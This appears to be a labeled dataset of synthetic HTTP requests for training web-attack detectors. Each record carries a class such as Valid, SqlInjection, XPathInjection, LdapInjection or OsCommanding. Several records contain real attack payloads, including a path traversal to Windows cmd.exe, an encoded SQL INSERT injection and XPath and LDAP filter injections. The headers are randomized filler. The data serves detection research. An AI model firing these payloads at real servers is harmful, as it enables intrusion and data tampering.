User-Agent: 9lS1k7 http://www.wtsibp4.be
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: neeetu/3.1 www.Ngilzh.shtml, 7.9 www.omvdb.js
Transfer-Encoding: identity
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 106.231.90.123
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25933
Start - Id: 37641
class: LdapInjection
PUT /j8kTd@W1lF7hF9n/.Bnph-i2TZDN15-7@p/hdrrddsngpaaeymihj6p/n7KY5@nkc/tsezmmje/ftee3nyR/reebtds7eirse/7P0HiDyNcWYK.Cj.php? HTTP/1.1
Content-Length: 116
Content-Language: cpms
Content-Encoding: compress
Content-Location: /ta6o/id5ecwis/1a95h/ensnjos.php3
Content-MD5: d3N1bnRld251c2djMGVhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 13:53:15 GMT
Last-Modified: Fri, 05 Nov 04 01:09:13 GMT
Host: 34.8.216.215
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-7, iso-8859-4, iso-8859-2;q=0.1, euc-cn, utf-7;q=0.0
Accept-Encoding: identity;q=0.5, deflate
Accept-Language: sHa-e76revmy;q=0.8
Cache-Control: min-fresh=8072
Client-ip: 76.236.29.239
Cookie: J0noyNOP=intcataisock_streamefHd;tajiae0e=a336ehuw0i;hQLBShSWjfromV=ec8
Cookie2: $Version="55"
Date: Thu, 26 Jan 06 17:10:57 GMT
ETag: "oj5Qe7MEf.fDr8DX"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Tue, 30 Jan 07 21:34:52 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "@l6I15syWjZBLMLi"
If-None-Match: "POOgnptlEENvRjltB"
If-Range: Sun, 26 Jul 09 12:21:06 GMT
Max-Forwards: 85
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: /otetg.bin
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 6.2; 90-ne; rv:4.6.3) Gecko/66221003
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: gda/5.8 249.207.108.174, 2.6 152.126.196.113, rwscO/4.8 169.132.87.134
Transfer-Encoding: identity
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 128.30.229.67
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

hh7icql=9187)(&(objectClass=hliy)(|(sn=  RS)(cn=De    J*))&leN=?2uls  a]3iec 6eew 

End - Id: 37641
Start - Id: 22232
class: Valid
GET /smoqenivzaa/sLjohspml5sT/ragb/idxfnefihasrgrE/eWHI-y52M1Z-kZepC/Aohsaw/ajjX44o9_rkPSAdg/te87hihesOjcnacxCs/seaanaz2mkza/tpc.z.msf?issaoaheDo=positionernsGoae&P@.90=ahono2IsCsiii93&idnA=n&lo=2oxml&iebFYoyj=2286588&c7=oDgoaAnangg8ac&stlliatte9acNb=iucLryo&ont=8dFoc%26aS2iteex&sX-TincludeSn=n6WL HTTP/1.0
Host: www.aw1s.biz
Connection: eee7i
Accept: text/*, audio/basic;q=0.2
Accept-Charset: iso-8859-4;q=0.3, iso-8859-8-i;q=0.5, iso-10646-ucs-2;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=901
Client-ip: 27.61.205.86
Cookie: iN8reeot=651;eoernbyaep=6678;EsnlbbwhhoknE=19;owsou=ZD9etAefeRclv
Cookie2: $Version="51"
Date: Thu, 26 Jun 08 17:02:08 UTC
ETag: W/"uo14Or1Ee5fYndf"
Expect: 100-continue
From: orEtts@ismhaeter.de
If-Modified-Since: Fri, 06 Feb 04 07:05:16 UTC
If-Unmodified-Since: Sun, 02 Sep 07 03:43:21 UTC
If-Match: *
If-None-Match: "Pg2.8ajZIg-ZC0B9T"
If-Range: Thu, 24 Mar 05 04:44:10 UTC
Max-Forwards: 93
MIME-Version: 4.2
Pragma: aks='2Shlras'
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: NTLM aEhkUmVlbG5pajhzbW0wYXNlNWhEa2Vpb2VlZXM0Y0thaXQ=
Range: -09
Referer: http://ugne5tar.cz/ti2dt.doc
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/7.5 (Windows; U; Win98 4.8; t0-7a; rv:9.7.5) Gecko/11466547
UA-CPU: Sparc
UA-Disp: 4787,167,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1581x2081
Via: 2.3 103.158.140.18:74
Transfer-Encoding: gzip
Upgrade: llxrnU/8.5, 9sez/6.3, 5o9gtz/1.6, sio/7.4, ahOwn/2.8
Warning: 325 152.245.154.177 "a0rdksFt4rsa" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 499244
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22232
Start - Id: 4866
class: Valid
PUT /ffCE/i0okIkrppA5g/kbYH@RB/ecbseryai/mqS1PNH6AoT0/4T/qar9twrRNdtp/dh4Aifqp4/uf.asp? HTTP/1.1
Content-Length: 105
Content-Language: I6Vtb
Content-Encoding: deflate
Content-Location: http://Tsnh.fr/emoC2hit.cfm
Content-MD5: ZUNyMUk1QXB0YWtkTnplZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Jul 08 04:36:57 GMT
Last-Modified: Fri, 24 Sep 04 16:41:33 GMT
Host: 70.145.226.147:80
Connection: close
Accept: video/*;q=0.5
Accept-Charset: euc-kr, x-mac-chinesesimp
Accept-Encoding: compress, compress;q=0.5, compress;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 81.131.26.158
Cookie: xsRi0Yi=SugsD;kaiqe74exnoi=s5WgtMTnvcl@;n8eaedzfaF=g8LWY.;qdneteai=t
Cookie2: $Version="272"
Date: Sat, 22 Sep 07 03:35:51 UTC
ETag: W/"427-5crDmCK3PnL"
Expect: Fsehcm
From: aehasf@rNt8rn.gov
If-Modified-Since: Tue, 20 Jul 04 05:46:55 GMT
If-Unmodified-Since: Mon, 31 Oct 05 03:44:14 UTC
If-Match: "F_x89ReBqtSIzpJ."
If-None-Match: "ieukCkF@7vJ3onT2C@"
If-Range: *
Max-Forwards: 8031
MIME-Version: 7.7
Pragma: 7hsacaU=g
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic bEVleG5hbmE6YWloZw==
Range: 09264-,-3
Referer: /pnce8naT.doc
TE: chunked,gzip,trailers
Trailer: Range
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 9.9; fv-pu; rv:4.5.5) Gecko/30795468
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 931x5037
Via: 7.6 154.53.27.186, 6.5 134.67.82.171, FTP/9.7 www.e0enhdsy.html
Transfer-Encoding: compress
Upgrade: tma36/6.6
Warning: 099 240.84.51.91:5325 "hIxWeR3owro3mogEtyrt" 
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

onejo=n9aujmI_w&jjYil0eE1uXj=oxmllike=|s&BppositionIB=e+&NYipgibDN0ao70=nosissV)opts5HoneoOewinnt

End - Id: 4866
Start - Id: 27703
class: Valid
GET /eUV.shtml?ooRa3bhymsho=dB7%40Pq&tniei7aeta=x8c&o7ushGt3=connect6y&ekaahcSseonlia=l&ogrea=dr4sr&aotojMgAeieUj=8609&EFEc=171201&reurbri=854535&bhl=eetcip5&sH=eHJI07V&sl=Nogateesleret HTTP/1.1
Host: 229.175.73.52:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.8
Accept-Language: LeWed-p4dwtoe, boion-r73ko
Cache-Control: no-store
Client-ip: 162.168.145.143
Cookie: gtdeletepasswdrBQ=e7L_m;aso=znmenscriptMnns;l;ramsac=crf>gpassthrur
Cookie2: $Version="78"
Date: Tue, 10 Jan 06 05:35:34 CET
ETag: W/"cMbfyIOoWmPld34ez"
Expect: re3Cf6
From: bTem2@peiaee.st
If-Modified-Since: Sun, 17 Oct 04 09:22:10 UTC
If-Unmodified-Since: Sun, 16 Jul 06 08:37:54 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Aug 06 07:20:55 CET
Max-Forwards: 858
MIME-Version: 9.8
Pragma: in=eys
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM M3JjYTZmcnN0dG9uaGFpZWJzc2RhdHlvT2lhb29TYWxlTXZZZ3R0aWQ=
Range: -672,-796173
Referer: http://gtcntri.uk/khTt/rKwr/81ufst.dll
TE: chunked,deflate;q=0.6,gzip;q=0.8
Trailer: TE
User-Agent: rXgfaFCBLv http://www.atntts.be
UA-CPU: PowerPC
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 576x948
Via: 0.0 www.naiea.gif:74
Transfer-Encoding: compress
Upgrade: 9arbi/8.9, aiFsaw/7.4, xsnrbe/3.3, 4rueeh/2.6
Warning: 308 www.tixKj.jpg "aaearsdrrhaedma" 
X-Forwarded-For: 241.242.54.210
X-Serial-Number: 9842192214995
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27703
Start - Id: 24384
class: Valid
GET /08wnull8mmMFvoKt09/6rgi/u8ecxsrsaata/cxoMYFqwE8Iu./E7h/tDXy/0Rd6SW-HUcp6/.wnetcatjeCunionD_kx/4y.shtml?1c67VANU=ah%5C%25e&nRqTIag=3lujotAehr&oopusrilFua=svarmexec HTTP/1.0
Host: www.saaeih.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic, windows-1254
Accept-Encoding: 
Accept-Language: loHe-6ein7l;q=0.0, chtqAeke-te;q=0.9, ottrai1-hcg, ibgt1g-oo
Cache-Control: max-stale
Client-ip: 248.165.100.251
Cookie: KQLTAQ_T@usrUG=35153;emmavic6evwf5=tnTEZ_q0u;childJ@OFMN=libhe
Cookie2: $Version="518"
Date: Tue, 15 Dec 09 03:01:20 GMT
ETag: "9dciFh3KeV@7.KxaU4"
Expect: 100-continue
From: Tieh@ettdu.fr
If-Modified-Since: Tue, 29 Apr 08 19:19:24 UTC
If-Unmodified-Since: Sun, 28 May 06 18:58:30 GMT
If-Match: "brabzzwy6Neay-@347"
If-None-Match: *
If-Range: "dhyrSw@JO-SKpewBNl"
Max-Forwards: 933
MIME-Version: 3.6
Pragma: ee=7hle
Proxy-Authorization: NTLM ZGE5ZWVjbGVjaW1vb2VuYnRoaWV0c3J1YWgxb2h0MWxkc2hpMG9nbHN0cA==
Authorization: NTLM cnJvb2loaHE3bm9JZWdlcXdyMmE1b2FsTGxwZWNjMGh0ZW94
Range: 18-
Referer: http://la6yt.be/pbl1Haro/wmurr.msf
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 8.7; ls-o1; rv:6.5.6) Gecko/04690129
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: identity
Upgrade: ya9/0.7
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 24384
Start - Id: 36438
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 18.24.59.188
Connection: eh2gaC
Accept: */*
Accept-Charset: koi8;q=0.4, gb2312, euc-kr, windows-1253, x-mac-arabic
Accept-Encoding: 
Accept-Language: Cit8veCg-ydal, ihneoa-sh, atu3vrlo-opr;q=0.7, t8Hp-wtito, taizf-pVS;q=0.4
Cache-Control: no-transform
Client-ip: 193.70.10.128
Cookie: tnEeRdl=602662574
Cookie2: $Version="63"
Date: Sat, 17 Dec 05 17:53:15 GMT
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Wed, 19 Dec 07 23:03:47 CET
If-Unmodified-Since: Fri, 01 Jun 07 07:04:52 GMT
If-Match: "x3zDIVX.39-Dxmjoaf"
If-None-Match: *
If-Range: Sun, 15 Jan 06 14:30:56 CET
Max-Forwards: 37
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: NTLM MWtjdWl1aXg2SWlwYmllZXRlZWhvaHBvdXl0ZWpjYWVodE9zYXJ0T3RlbWE=
Range: 51-
Referer: /mail.html
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: issioehzfe (d@y0pi6B; crP61sU3uk; aT5e-0O; hA5zmGG4)
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: ran/7.4 www.ml9ocat.jpeg, 7.0 www.ebswlm.jpeg
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36438
Start - Id: 12989
class: Valid
GET /ieNW/5xEEsirAQ./xQJORj5/alrtmsnsiuz/Ii3oresrm/tgm/rosnktSrL/lmIZl28A./htO/as0lm4hnn6pesnch/h-S3PECy0-e81EYj.cgi? HTTP/1.0
Host: 149.188.192.42
Connection: pmdit2a
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Nhuh8tb-le, elapce-iytpen;q=0.6, mitBchtn-qte;q=0.8, avi-5e, reHtaH-t5bf
Cache-Control: no-cache
Client-ip: 36.28.31.243
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="3"
Date: Sat, 24 Oct 09 23:11:19 GMT
ETag: W/"@dtr3ZETT_u3A8ZN_"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Sun, 11 Oct 09 01:30:00 GMT
If-Unmodified-Since: Sat, 19 Aug 06 11:55:11 GMT
If-Match: "NJqXSc-8j1yVa@-f"
If-None-Match: "oRrungw30jF8yAkQu"
If-Range: *
Max-Forwards: 74
MIME-Version: 8.0
Pragma: sZlfH2t='sE'
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: Digest qop=auth
Range: 459-
Referer: /Fe6oedR/cjeph/iitnei/aalbeu/a6rh.png
TE: gzip,deflate
Trailer: Range
User-Agent: Mozilla/2.4 (X11; U; Unix 5.6; Er-ol; rv:0.4.0) Gecko/74694714
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8402x0357
Via: 5.6 127.223.120.2, 3.1 224.202.54.208, 5.0 www.eunTh.js
Transfer-Encoding: gzip
Upgrade: eir/2.5, te5s/6.4
Warning: 479 www.eorrw.html "seteahmS" 
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 39169260132979
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12989
Start - Id: 35318
class: SqlInjection
GET /eiUh/a6/iJPfGvO08C6j19FEC_hU/e5RZZbv4/udXNv9KbQP/VUACEHSKYdpd.swf?reeop=%25k&0m2ucr=iqmowroebyiehrafi&nWeeitetlaie=%3B++EXEC%28+%27INS%27%2B%27ERT+++INTO+users+++++values%287%2C%27roitecesp%27%2C%27eps%27++++%29%29&iewfowltpp4j=sock_streameanrimAwinntkanlo HTTP/1.0
Host: www.tsrnut6.fr
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=521
Client-ip: 89.110.200.190
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="423"
Date: Sat, 14 Aug 04 24:12:50 UTC
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: kI3zct@drabH.cz
If-Modified-Since: Wed, 09 Dec 09 17:46:55 CET
If-Unmodified-Since: Tue, 04 May 10 10:19:23 UTC
If-Match: "sNU251.JMn4aNGS"
If-None-Match: *
If-Range: *
Max-Forwards: 876
MIME-Version: 4.0
Pragma: ounihoth='ame'
Proxy-Authorization: Digest nc=0A24AbAd
Authorization: NTLM ZXNlYVF0dDVzYWN2ZWRpc2Y4aExzb2N0ZWRkc0Vub2N0ZTU5bGFocnQ=
Range: 9898-,30840-71
Referer: http://r2ee.st/mdoysmbs/eaeo.php3
TE: gzip;q=0.9,chunked
Trailer: User-Agent
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 1.7; du-en; rv:7.7.1) Gecko/63238124
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: rc9uha/8.1 136.36.32.201
Transfer-Encoding: deflate
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35318
Start - Id: 49672
class: XPathInjection
GET /oee6hcoasgPoyxn/iLrAgD/rFvmaO_J4iYGPRe/n6F/a2etdcOtg.pl?jmlhnsbi0esVm=e%5Ch7ew%2F%3Crn&ctssXtool=sk97hcoc%27+++or+++1%3C+++++dgp%2Fnldv%2Frleio%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D034%5D+or+++%27Jiebfsit%27++++%3D++%27&aiesn=as9oH028.JW5 HTTP/1.0
Host: 170.204.186.68
Connection: iZlne
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: itM6dE-Utetw;q=0.6
Cache-Control: no-store
Client-ip: 74.210.240.133
Cookie: swrtca7Ti=ioiIbw;ilani4tbser4=egWlbAYFnpv;eomwe9u=64
Cookie2: $Version="1"
Date: Sat, 28 Oct 06 20:41:49 GMT
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Sat, 22 Mar 08 07:51:23 GMT
If-Unmodified-Since: Mon, 06 Mar 06 13:44:48 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Aug 09 11:38:34 UTC
Max-Forwards: 5424
MIME-Version: 5.9
Pragma: aS='emEtmhrw'
Proxy-Authorization: Daieeh fnea=l3o3no
Authorization: Basic cW9pb3NzOmVvdW5t
Range: -09
Referer: http://www.sistkaf.ch/fhrwtaTp/brRuat/trsrpu.tar.gz
TE: trailers
Trailer: Range
User-Agent: etaoe (1RzL5U; xcRFxqrp; sxHrDgES; r7oJPPiT)
UA-CPU: Sparc
UA-Disp: 6990,614,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: 7.3 www.beosnefe.shtml:962
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 731 www.em2ety7n.htm "ewloieirse6ett" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 40217863095
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49672
Start - Id: 34095
class: Valid
PUT /585l/shy6/frnmtsn/lxreplacesOJApasswd/lFmCTCA81O/em7UHMRDZmrKerBXUk/Pc9/kQ_QppTU.cgi? HTTP/1.1
Content-Length: 182
Content-Language: iehaois
Content-Encoding: deflate
Content-Location: http://www.51io.fr/fsyrnwi/Prhld5i/bieagMe/rhff6s.png
Content-MD5: c21mb21leG53YXBIbmc4ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Dec 09 18:32:11 UTC
Last-Modified: Sun, 29 Jul 07 03:17:37 GMT
Host: www.arxnd.be
Connection: keep-alive
Accept: audio/*, video/mpeg;q=0.5, video/quicktime
Accept-Charset: shift_jis;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=08981
Client-ip: 225.142.155.164
Cookie: i5eScwtmhO=rE;aaefeie0te4tg=Ad8wuLmcr;nratahxvoo7l=e6s3)kxNat'ieh<ay
Cookie2: $Version="88"
Date: Mon, 10 Jul 06 07:28:31 UTC
ETag: W/"0.MnTHDCqKwO0QoK"
Expect: nnc7t
From: 2s3rpd@N8dboRb.biz
If-Modified-Since: Mon, 31 May 04 17:26:55 CET
If-Unmodified-Since: Sat, 27 May 06 19:23:40 UTC
If-Match: "bzIGeIYUj1ibwf1pBH"
If-None-Match: "6n.Mo39Q8QciLZzF-c"
If-Range: *
Max-Forwards: 7869
MIME-Version: 3.6
Pragma: e='bton4aOu'
Proxy-Authorization: Basic bmxlbzpsZHN0YmVteA==
Authorization: McaMp esrt8b=6i27fl
Range: 407-
Referer: /Gwyaxa/Z0nso/ytEOt7rd/dmSrlh.cgi
TE: trailers,trailers,chunked;q=0.1
Trailer: Accept-Charset
User-Agent: thEs/4.1.4.5.1
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7731x678
Via: 0.9 15.77.49.239
Transfer-Encoding: identity
Upgrade: knln/8.6
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 155066
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

jJR7childWPaps=v1pTb@p&RwsLpTT.php5qL=erempntd5fbr&sapzrkt6Wrlcmo=bPZLLpbdKAkd&8oo9catyn=khpwo&4ncdkjZ3x=6&bReyusaeem=doda0dib&fb2Wsclersee=89591&soa5Wnbl=r&2kbodyzPX2R9_e=ol3paU6t

End - Id: 34095
Start - Id: 4501
class: Valid
PUT /1xHD6rGBBB7_SS8D/Wichpasswdnn-Z6Ph/iuIswcoosoczlah/xS6/uBqs@aMXY2QW@V/bA8mQuOXa.gif? HTTP/1.1
Content-Length: 273
Content-Language: 7erso,c,erfaoi
Content-Encoding: identity
Content-Location: http://www.dWih.gov/feia/niahy.rar
Content-MD5: bzFJcm52ZXJjaHRlZXNOYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Feb 05 03:25:36 CET
Last-Modified: Sat, 29 Aug 09 13:08:43 UTC
Host: www.3ranin0n7.be
Connection: close
Accept: */*
Accept-Charset: windows-1257, windows-874;q=0.8, iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: cmnte='tytg'
Client-ip: 49.195.250.8
Cookie: wdravhltnr7tn=29030
Cookie2: $Version="06"
Date: Sat, 02 Apr 05 20:12:39 UTC
ETag: W/"DuPYA_Ubhic0Oh8FP.On"
Expect: 100-continue
From: epetho@ahrgiexdr.gov
If-Modified-Since: Wed, 12 Dec 07 12:47:41 UTC
If-Unmodified-Since: Mon, 29 Dec 08 17:36:18 UTC
If-Match: "BLwD9iMqK07S2rMcNM"
If-None-Match: "Ny7pN4-etx_aVg@9"
If-Range: Fri, 11 Mar 05 15:37:53 CET
Max-Forwards: 3
MIME-Version: 8.2
Pragma: toayhn=is9lmwp
Proxy-Authorization: yuax thoeNl=intAt19
Authorization: Basic dnlzbWFsOnRyc25uaHQ=
Range: -6930
Referer: http://lscsec.be/cyelh.cfm
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 8.4; 41-eA; rv:5.4.1) Gecko/70855192
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 654x7846
Via: 1.9 158.73.51.77
Transfer-Encoding: gzip
Upgrade: aensr/9.0, tag/3.6
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

l4hh=odi&E8gEoO7Yq=bh&rarCmn=26485&FlVagroup by=ogrHrals&4tiilozkEtaw6za=);o1sebw&8e99ac1omc=vr497ltywsea&a8rzrb=siiaatol4cehnnaIlr&bresdiona2Leex=dzeOmlNulndeau&dhoo7jie=3u;to&gehdExiaen8Hoiq=9rt8servicesjzasue ny&hAbfnOqto=udhsva&en=]e'&oaimatmmtwyn=e4Yojy0@3

End - Id: 4501
Start - Id: 19910
class: Valid
GET /LOnisTiorjteae/bq_YVYGRp@uzGAXF/oogAN2mnThik6ft/ao7h4Dndvprndaeur/BM1Bupdatechild/nateEgostfd/em/fqf6Ck08uKi4/eTsboHB3-a99lS3QU0JL/oneHa.exe?ceslir=4&nwirishentf0=305674932&17bSfnFrnldti=uCpz&dani0n1Ehv=nA6eo9cxsdwi6fS5t&staodevzUal4=22&qsAnsnt=9699283&bzodeT=ynwp&dfl2iurfvdr=5852&databNfuruvcg=%7Ci&qekctnhfdebc1=o2elnYt1&oiMetbtis=samalog&sr0onluulc4vn0R=ltOxgYeWai%40 HTTP/1.1
Host: www.tneeb1B.be
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-korean, x-mac-chinesesimp
Accept-Encoding: *;q=0.4
Accept-Language: tGkR-9ostgo, saa4ei-hhl1ka;q=0.7, uatceib-Sw
Cache-Control: only-if-cached
Client-ip: 217.141.253.33
Cookie: usVspcrtvcg=5709658;G-EB8zraDhyF=dQFr;5usr3e=8381851
Cookie2: $Version="93"
Date: Thu, 28 Feb 08 03:43:17 UTC
ETag: "cVzjY4J5nvzL3xt6l"
Expect: yhot
From: artPioiw@etdnedoep.fr
If-Modified-Since: Sat, 03 Feb 07 08:50:43 CET
If-Unmodified-Since: Thu, 19 Feb 09 20:13:36 UTC
If-Match: "mvjoVZmhrajdPJPltD"
If-None-Match: *
If-Range: Thu, 01 Jul 04 12:07:22 GMT
Max-Forwards: 8
MIME-Version: 0.4
Pragma: i=1npy4ua
Proxy-Authorization: Digest nonce
Authorization: htpt nzKcRunr=aznays
Range: -8804
Referer: /dautuu/enta4iq6/3ldMea.shtml
TE: deflate;q=0.9,chunked;q=0.7
Trailer: Connection
User-Agent: f9aeoqnmnetsgdHttfiG
UA-CPU: StrongARM
UA-Disp: 611,1277,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 205x6501
Via: 3.9 209.107.184.183
Transfer-Encoding: gzip
Upgrade: nofnHJ/3.3, Eo0/1.9, eex/2.7, dloapf/3.8
Warning: 431 103.132.199.19 "edesstaoetncjym5olrr" 
X-Forwarded-For: 43.150.154.249
X-Serial-Number: 907181442097604874
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19910
Start - Id: 32688
class: Valid
PUT /2B@v/ZQbreolf_WJinboot.ini/Jj20St/6nmsben2u6ttctebnao/wgetx2I5W/6lnoeloatqsl6aearv0/ehtmnafesfnrlnoinyh/h02mYz2c/w9EZAg52De_FXkL/VperlXUO/nanRne9r/ssedhaosNtrsc4.jpeg? HTTP/1.0
Content-Length: 192
Content-Language: Tstonom,aj2,a
Content-Encoding: identity
Content-Location: /taan9m/aXeune8/Ghet1ab1/5ce3u4oe.bin
Content-MD5: YWE2MGRzZWFpb3VldWRhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 09:39:24 GMT
Last-Modified: Thu, 19 Apr 07 14:20:50 GMT
Host: www.SmxUtlrI83.de
Connection: keep-alive
Accept: audio/*;q=0.9
Accept-Charset: x-mac-japanese;q=0.7, macintosh;q=0.7, iso-8859-15
Accept-Encoding: gzip;q=0.0, identity;q=0.9, identity, compress;q=0.1
Accept-Language: 0as-syLto, omf-aiP, mae-upyxn, xwsn2ead-0t
Cache-Control: s='ei'
Client-ip: 240.131.245.195
Cookie: tes3amlyrt=324;cethue2xsoubt1h=3Ottmp$ft vtta[s;tpssizr5in7=e;oaesorzna=a2dasm Au[;enss1pLibr5te=74
Cookie2: $Version="68"
Date: Tue, 15 Mar 05 05:29:18 GMT
ETag: W/"wqr0_qjGdgSGaE1Ir.8"
Expect: poFmtt=tloiG1;s7auea=qjnzhO
From: ehmije@nnt84tTw.st
If-Modified-Since: Tue, 11 Jan 05 08:18:26 CET
If-Unmodified-Since: Wed, 20 Oct 04 11:41:53 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Mar 08 22:43:50 CET
Max-Forwards: 0
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM cG5nenNpZWlmMW9kaGFlZGlsd0huZWJhdGVlZW1lcHQyb3Nlbw==
Authorization: Basic dkxqaWx1ZTphcnRl
Range: 912858-831797,7147-,45-231351
Referer: /ieaSkb.mdb
TE: trailers,deflate
Trailer: Authorization
User-Agent: Buugsrt9rfZsft
UA-CPU: MIPS
UA-Disp: 6556,232,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1210x8264
